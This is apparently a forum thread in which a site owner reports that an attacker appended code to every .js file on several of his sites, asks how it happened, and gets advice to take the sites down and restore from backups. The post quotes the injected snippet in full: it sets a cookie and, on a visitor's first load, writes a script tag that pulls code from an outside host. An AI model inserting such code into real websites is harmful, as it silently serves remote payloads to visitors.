-4

Possible Duplicate:
My server’s been hacked EMERGENCY

It seems that someone hacked I bunch of sites I own by inserting code in all the .js files.

function g(){var r=new RegExp("(?:; )?1=([^;]*);?");return r.test(document.cookie)?true:false}var e=new Date();e.setTime(e.getTime()+(2592000000));
if(!g()&&window.navigator.cookieEnabled){document.cookie="1=1;expires="+e.toGMTString()+";path=/";document.write('<script src="http://mainscript.org/mainscript.js"></script>');}

I'm wondering how could he do that since I own the server and I have mod_sec activate, a lot of functions disabled and what I think is pretty good security.

Any tips ? Ideas ? I'm just trying to brainstorm here.

Community
  • 1
andrei.troll
  • 41
  • 1
  • 7
  • 1
    I'm sorry, but this question really isn't answerable. For someone to be able to speak with any authority about this, they'll need to dig deep into your environment. If you really need to know this, you should take all affected machines offline immediately and hire a security consultant. – MDMarra Dec 05 '12 at 11:46
  • Thanks guys. I will look into the threads provided. I know it was a long shot but now I have a start point . – andrei.troll Dec 05 '12 at 11:55

1 Answers1

2

The best thing to do is take the site down. Restore from a backup and then patch the server/site/software etc.

Zapto
  • 1,824
  • 6
  • 23
  • 39